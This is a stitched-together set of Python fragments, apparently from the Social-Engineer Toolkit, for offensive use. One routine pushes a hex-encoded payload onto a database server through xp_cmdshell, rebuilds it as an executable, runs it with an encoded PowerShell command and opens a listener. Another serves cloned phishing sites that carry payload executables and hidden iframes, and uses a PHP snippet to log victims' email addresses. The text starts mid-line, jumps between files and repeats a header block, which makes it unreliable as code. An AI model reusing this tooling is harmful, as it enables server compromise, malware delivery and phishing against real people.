setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" %
(line, random_file))
setcore.PrintStatus("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.PrintStatus("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.PrintStatus(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.PrintStatus("Deploying payload to victim machine (hex): " +
setcore.bcolors.BOLD + str(data) +
setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" %
(data, random_exe))
setcore.PrintStatus(
"Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" %
(random_file))
target_server.execute_query("xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
setcore.PrintStatus("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.PrintStatus("Spawning seperate child process for listener...")
subprocess.Popen(
"cp src/program_junk/web_clone/x ./ 1> /dev/null 2>/dev/null",
shell=True).wait()
# start a threaded webserver in the background
child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
# grab the port options
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath),
"r")
port = fileopen.read().rstrip()
# if for some reason the port didnt get created we default to 443
if not os.path.isfile("%s/src/program_junk/port.options" %
(definepath)):
port = "443" # default 443
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
child2 = pexpect.spawn(
"python src/payloads/set_payloads/listener.py %s" % (port))
# now back
os.chdir("src/program_junk/web_clone/")
setcore.PrintStatus("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command, ))
time.sleep(5)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command, ))
# if pexpect doesnt exit right then it freaks out
try:
# interact with the child process through pexpect
child2.interact()
subprocess.Popen("rm x 1> /dev/null 2> /dev/null", shell=True).wait()
except:
pass
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace(
"<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>",
'<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW +
"[*] Moving payload into cloned website." +
core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(
os.path.join(definepath,
"src/html/Signed_Update.jar.orig"),
os.path.join(core.setdir, applet_name))
shutil.copyfile(
os.path.join(core.setdir, applet_name),
os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status(
"The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "web_clone/msf.exe"))
print(
"\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
)
shutil.copyfile(
os.path.join(core.setdir, "web_clone/msf.exe"),
os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (
r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server,
args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server,
(web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print(
"{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(
core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop",
shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(
target=webserver.start_server,
args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning(
"Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
)
input(
"\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
.format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(
core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(
os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(
os.path.join(apache_path, "harvester_{}.txt".format(now)),
'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(
os.path.join(apache_path, "harvester_{}.txt".format(now))),
shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace(
"<body>", "<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
.format(now))
with open(os.path.join(apache_path, "index.php"),
"w") as filewrite:
filewrite.write(data)
core.print_status(
"All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
# Dave Kennedy (@hackingdave)
#
##########################################################################
##########################################################################
##########################################################################
#
# grab the interface ip address
#
ipaddr = core.grab_ipaddress()
#
# metasploit_path here
#
msf_path = core.meta_path() + "msfconsole"
################################################################
#
# shell exec payload hex format below packed via upx
#
# shellcodeexec was converted to hex via binascii.hexlify:
#
# import binascii
# fileopen = open("shellcodeexec.exe", "wb")
# data = fileopen.read()
# data = binascii.hexlify(data)
# filewrite = open("hex.txt", "w")
# filewrite.write(data)
# filewrite.close()
#
#!/usr/bin/python
import subprocess
import os
import re
import sys
from src.core import setcore
# definepath
definepath=os.getcwd()
sys.path.append(definepath)
meta_path = setcore.meta_path()
# launch msf listener
setcore.PrintInfo("The payload can be found in the SET home directory.")
choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]"))
if choice == "yes" or choice == "y":
# if we didn't select the SET interactive shell as our payload
if not os.path.isfile("src/program_junk/set.payload"):
setcore.PrintInfo("Please wait while the Metasploit listener is loaded...")
subprocess.Popen("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path), shell=True).wait()
# if we did select the set payload as our option
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/port.options", "r")
set_payload = file("src/program_junk/set.payload", "r")
port = fileopen.read().rstrip()
set_payload = set_payload.read().rstrip()
if set_payload == "SETSHELL":
# Dave Kennedy (@hackingdave)
#
##########################################################################
##########################################################################
##########################################################################
#
# grab the interface ip address
#
ipaddr = core.grab_ipaddress()
#
# metasploit_path here
#
msf_path = core.meta_path() + "msfconsole"
################################################################
#
# shell exec payload hex format below packed via upx
#
# shellcodeexec was converted to hex via binascii.hexlify:
#
# import binascii
# fileopen = open("shellcodeexec.exe", "wb")
# data = fileopen.read()
# data = binascii.hexlify(data)
# filewrite = open("hex.txt", "w")
# filewrite.write(data)
# filewrite.close()
#
